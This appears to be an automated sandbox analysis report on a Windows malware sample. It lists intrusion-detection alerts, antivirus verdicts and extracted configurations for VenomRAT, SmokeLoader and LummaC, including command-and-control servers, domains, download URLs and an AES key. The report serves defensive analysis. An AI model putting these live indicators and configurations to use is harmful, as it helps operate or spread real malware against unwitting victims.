                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-24T19:55:04.239382+0200
                  SID:2838522
                  Source Port:51349
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-07-24T19:55:06.316845+0200
                  SID:2838522
                  Source Port:51349
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-07-24T19:57:02.045424+0200
                  SID:2054602
                  Source Port:49769
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-24T19:57:31.288308+0200
                  SID:2054604
                  Source Port:49793
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-24T19:57:36.718743+0200
                  SID:2054604
                  Source Port:49797
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-24T19:58:10.395667+0200
                  SID:2052267
                  Source Port:4449
                  Destination Port:49821
                  Protocol:TCP
                  Classtype:Domain Observed Used for C2 Detected
                  Timestamp:2024-07-24T19:56:52.823568+0200
                  SID:2054653
                  Source Port:49756
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-24T19:56:51.530840+0200
                  SID:2054653
                  Source Port:49754
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-24T19:57:17.023516+0200
                  SID:2054593
                  Source Port:51893
                  Destination Port:53
                  Protocol:UDP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-24T19:56:57.773404+0200
                  SID:2054602
                  Source Port:49765
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-24T19:57:40.123477+0200
                  SID:2054604
                  Source Port:49800
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-24T19:56:52.312670+0200
                  SID:2054602
                  Source Port:49756
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-24T19:55:40.357738+0200
                  SID:2807908
                  Source Port:49711
                  Destination Port:799
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-07-24T19:55:43.508123+0200
                  SID:2807908
                  Source Port:49716
                  Destination Port:799
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-07-24T19:57:40.591985+0200
                  SID:2054653
                  Source Port:49800
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-24T19:56:54.697261+0200
                  SID:2048094
                  Source Port:49760
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-07-24T19:56:50.928961+0200
                  SID:2054602
                  Source Port:49754
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-24T19:56:54.154691+0200
                  SID:2054602
                  Source Port:49760
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-24T19:56:59.871319+0200
                  SID:2054602
                  Source Port:49767
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-24T19:57:17.531048+0200
                  SID:2054604
                  Source Port:49780
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-24T19:57:18.875038+0200
                  SID:2054604
                  Source Port:49782
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-24T19:57:22.094261+0200
                  SID:2054604
                  Source Port:49785
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-24T19:57:24.551102+0200
                  SID:2048094
                  Source Port:49787
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-07-24T19:57:45.110905+0200
                  SID:2054653
                  Source Port:49803
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-24T19:57:05.217652+0200
                  SID:2054653
                  Source Port:49772
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-24T19:57:41.841093+0200
                  SID:2054604
                  Source Port:49803
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-24T19:57:22.834216+0200
                  SID:2048094
                  Source Port:49785
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-07-24T19:57:19.383145+0200
                  SID:2054653
                  Source Port:49782
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-24T19:55:09.065962+0200
                  SID:2807908
                  Source Port:49703
                  Destination Port:799
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-07-24T19:55:40.788193+0200
                  SID:2807908
                  Source Port:49712
                  Destination Port:799
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-07-24T19:55:43.046215+0200
                  SID:2807908
                  Source Port:49715
                  Destination Port:799
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-07-24T19:57:24.046577+0200
                  SID:2054604
                  Source Port:49787
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-24T19:55:05.253162+0200
                  SID:2838522
                  Source Port:51349
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-07-24T19:55:41.395577+0200
                  SID:2807908
                  Source Port:49713
                  Destination Port:799
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 7Y18r(14).exeAvira: detected
                  Source: http://ddos.dnsnb8.net:799/cj//k1.rarURL Reputation: Label: malware
                  Source: http://ddos.dnsnb8.net:799/cj//k3.rarAvira URL Cloud: Label: phishing
                  Source: http://gebeus.ru/tmp/index.phpAvira URL Cloud: Label: malware
                  Source: http://cx5519.com/tmp/index.phpAvira URL Cloud: Label: malware
                  Source: http://evilos.cc/tmp/index.phpAvira URL Cloud: Label: malware
                  Source: http://ddos.dnsnb8.net:799/cj//k5.rarAvira URL Cloud: Label: phishing
                  Source: https://mussangroup.com/wp-content/images/pic1.jpgAvira URL Cloud: Label: malware
                  Source: http://ddos.dnsnb8.net:799/cj//k3.rar6Avira URL Cloud: Label: phishing
                  Source: https://callosallsaospz.shop/apiAvira URL Cloud: Label: malware
                  Source: http://ddos.dnsnb8.net:799/cj//k3.rarBAvira URL Cloud: Label: malware
                  Source: http://ddos.dnsnb8.net:799/cj//k4.rarOAvira URL Cloud: Label: phishing
                  Source: http://ddos.dnsnb8.net:799/cj//k2.rarAvira URL Cloud: Label: phishing
                  Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
                  Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
                  Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
                  Source: 0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmpMalware Configuration Extractor: VenomRAT {"Server": "94.156.79.190,193.222.96.24", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.2", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "KSXE50q1aBZS6zviv09LVn6h1agzpC0c", "Mutex": "aqswvfsywrpgi", "Certificate": "MIICLzCCAZigAwIBAgIVAMlWIVjWC1nh9ktodokpLXg1Z7jDMA0GCSqGSIb3DQEBDQUAMGAxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjEOMAwGA1UECwwFVmVub20xGjAYBgNVBAoMEVZlbm9tUkFUIEJ5IFZlbm9tMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjIwNDIzMDE0ODMzWhcNMzMwMTMwMDE0ODMzWjATMREwDwYDVQQDDAhWZW5vbVJBVDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEApVFyhBoFr/9yziPYmAfupGi+6Dr9HlSEu4y7EX9UWIylw9CS4Voa/+1ncAOzogfrktnFzQ8mi0CRy5KZ/h/xY3W/RZXSOuTiBxwuYJ21ZyP0F3NE0Dk0iKJbBQvE/zmGVU3o0nSQEJ5eKQF9cj8SCsEac4tcpOeJWGRR4EOaNH8CAwEAAaMyMDAwHQYDVR0OBBYEFAXo7kHUsbMm0Un9lzKiyH3ZKuRhMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEAToihy3/hoIiQqRgL8LQs+1ZyJfdHwOCmbsgIXHWfuygpkNuCVgWyx00+6WG1rrFOf0JZMar0D7txlc/bnAasiYPUL5EXEL/uikR3e8zzcQOhRAszKHobjW3VxGBYxClWdkhDZNxoiXTPs53aoby1ddub4dbDXQzIo//fNN30FNc=", "ServerSignature": "WlDXsoQjOeItY/AjpYunYYPwdj7pVZk3AxP9TSMhaMXlTxtOfd/QUD9Td9tdZ/gqN8Mrd7dFRlgi6WvGULUn8oYyaqUlD8bhcaHBCb7iJvzMqGTkJovPSDs+PdIfDJwTAVY/j6J2UDT7B9Hux+AFROKdJXYBG233NvPZNBdQ8Yc=", "BDOS": "null"}
                  Source: 0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmpMalware Configuration Extractor: AsyncRAT {"Server": "94.156.79.190,193.222.96.24", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.2", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "KSXE50q1aBZS6zviv09LVn6h1agzpC0c", "Mutex": "aqswvfsywrpgi", "Certificate": "MIICLzCCAZigAwIBAgIVAMlWIVjWC1nh9ktodokpLXg1Z7jDMA0GCSqGSIb3DQEBDQUAMGAxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjEOMAwGA1UECwwFVmVub20xGjAYBgNVBAoMEVZlbm9tUkFUIEJ5IFZlbm9tMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjIwNDIzMDE0ODMzWhcNMzMwMTMwMDE0ODMzWjATMREwDwYDVQQDDAhWZW5vbVJBVDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEApVFyhBoFr/9yziPYmAfupGi+6Dr9HlSEu4y7EX9UWIylw9CS4Voa/+1ncAOzogfrktnFzQ8mi0CRy5KZ/h/xY3W/RZXSOuTiBxwuYJ21ZyP0F3NE0Dk0iKJbBQvE/zmGVU3o0nSQEJ5eKQF9cj8SCsEac4tcpOeJWGRR4EOaNH8CAwEAAaMyMDAwHQYDVR0OBBYEFAXo7kHUsbMm0Un9lzKiyH3ZKuRhMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEAToihy3/hoIiQqRgL8LQs+1ZyJfdHwOCmbsgIXHWfuygpkNuCVgWyx00+6WG1rrFOf0JZMar0D7txlc/bnAasiYPUL5EXEL/uikR3e8zzcQOhRAszKHobjW3VxGBYxClWdkhDZNxoiXTPs53aoby1ddub4dbDXQzIo//fNN30FNc=", "ServerSignature": "WlDXsoQjOeItY/AjpYunYYPwdj7pVZk3AxP9TSMhaMXlTxtOfd/QUD9Td9tdZ/gqN8Mrd7dFRlgi6WvGULUn8oYyaqUlD8bhcaHBCb7iJvzMqGTkJovPSDs+PdIfDJwTAVY/j6J2UDT7B9Hux+AFROKdJXYBG233NvPZNBdQ8Yc=", "BDOS": "null", "External_config_on_Pastebin": "false"}
                  Source: 00000004.00000002.1462544798.0000000000660000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://evilos.cc/tmp/index.php", "http://gebeus.ru/tmp/index.php", "http://office-techs.biz/tmp/index.php", "http://cx5519.com/tmp/index.php"]}
                  Source: BitLockerToGo.exe.4216.31.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop"], "Build id": "bOKHNM--"}
                  Source: C:\Users\user\AppData\Local\Temp\B552.exeReversingLabs: Detection: 50%
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeReversingLabs: Detection: 15%
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeReversingLabs: Detection: 92%
                  Source: C:\Users\user\AppData\Roaming\ftejcedReversingLabs: Detection: 94%
                  Source: 7Y18r(14).exeReversingLabs: Detection: 94%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeJoe Sandbox ML: detected
                  Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeJoe Sandbox ML: detected
                  Source: 7Y18r(14).exeJoe Sandbox ML: detected
                  Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmpString decryptor: indexterityszcoxp.shop
                  Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmpString decryptor: lariatedzugspd.shop
                  Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmpString decryptor: callosallsaospz.shop
                  Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmpString decryptor: outpointsozp.shop
                  Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmpString decryptor: liernessfornicsa.shop
                  Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmpString decryptor: upknittsoappz.shop
                  Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmpString decryptor: shepherdlyopzc.shop
                  Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmpString decryptor: unseaffarignsk.shop
                  Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmpString decryptor: liernessfornicsa.shop
                  Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                  Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                  Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmpString decryptor: - Screen Resoluton:
                  Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmpString decryptor: - Physical Installed Memory:
                  Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmpString decryptor: Workgroup: -
                  Source: 00000026.00000002.2909146910.0000000003FDE000.00000002.10000000.00040000.00000000.sdmpString decryptor: qToYrJ--
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EC7A10 CryptUnprotectData,31_2_02EC7A10
                  Source: F6D9.exe, 00000018.00000003.2189735837.000002598C8F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_46ba3798-7
                  Source: 7Y18r(14).exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\7Y18r(14).exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.10:49737 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49738 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49739 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49741 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49744 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 162.0.235.84:443 -> 192.168.2.10:49745 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49746 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49750 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49752 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49754 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49753 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49756 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49757 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.10:49759 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49760 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49761 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49762 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.10:49763 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49764 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49765 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49766 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49767 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49768 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49769 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49771 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49772 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49773 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49774 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49775 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49776 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49777 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49778 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49779 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49780 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49781 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49782 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49783 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49785 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49786 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49787 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49788 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49789 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49790 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49791 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49792 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49793 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49794 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49795 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49796 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49797 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49798 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49800 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49801 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49803 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49804 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49806 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49808 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49809 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49810 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49811 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49812 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49813 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49814 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49816 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49817 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49818 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49819 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49820 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49822 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49824 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49826 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49827 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49828 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49829 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49830 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49831 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49832 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49834 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49835 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49836 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49837 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49838 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49839 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49841 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49842 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49843 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49844 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49845 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49846 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49848 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49849 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49850 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49851 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49852 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49853 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49854 version: TLS 1.2
                  Source: Binary string: rust_dave_sideload.pdb source: vm.exe, 00000025.00000002.3761757300.0000000070078000.00000002.00000001.01000000.00000018.sdmp, lm.exe, 00000026.00000002.2910739213.0000000070008000.00000002.00000001.01000000.00000019.sdmp, vm.exe, 0000002B.00000002.2941431494.0000000070078000.00000002.00000001.01000000.00000018.sdmp, g2m.dll.32.dr, g2m.dll0.32.dr
                  Source: Binary string: BitLockerToGo.pdb source: B552.exe, 0000001B.00000002.2349461776.000000C000400000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000003.2323520937.0000023B60790000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000002.2354952612.000000C000800000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000002.2354952612.000000C0008EC000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000003.2323973343.0000023B60750000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb& source: powershell.exe, 00000020.00000002.2624078104.0000020A687F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2624078104.0000020A687AD000.00000004.00000800.00020000.00000000.sdmp, lm.exe.32.dr
                  Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.5.dr
                  Source: Binary string: BitLockerToGo.pdbGCTL source: B552.exe, 0000001B.00000002.2349461776.000000C000400000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000003.2323520937.0000023B60790000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000002.2354952612.000000C000800000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000002.2354952612.000000C0008EC000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000003.2323973343.0000023B60750000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb source: powershell.exe, 00000020.00000002.2624078104.0000020A687F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2624078104.0000020A687AD000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000025.00000000.2595768222.0000000000402000.00000002.00000001.01000000.00000016.sdmp, vm.exe, 00000025.00000002.3739220721.0000000000402000.00000002.00000001.01000000.00000016.sdmp, lm.exe, 00000026.00000000.2596792457.0000000000402000.00000002.00000001.01000000.00000017.sdmp, lm.exe, 00000026.00000002.2884350710.0000000000402000.00000002.00000001.01000000.00000017.sdmp, vm.exe, 0000002B.00000002.2871363883.0000000000402000.00000002.00000001.01000000.00000016.sdmp, vm.exe, 0000002B.00000000.2753936670.0000000000402000.00000002.00000001.01000000.00000016.sdmp, lm.exe.32.dr

                  Spreading

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
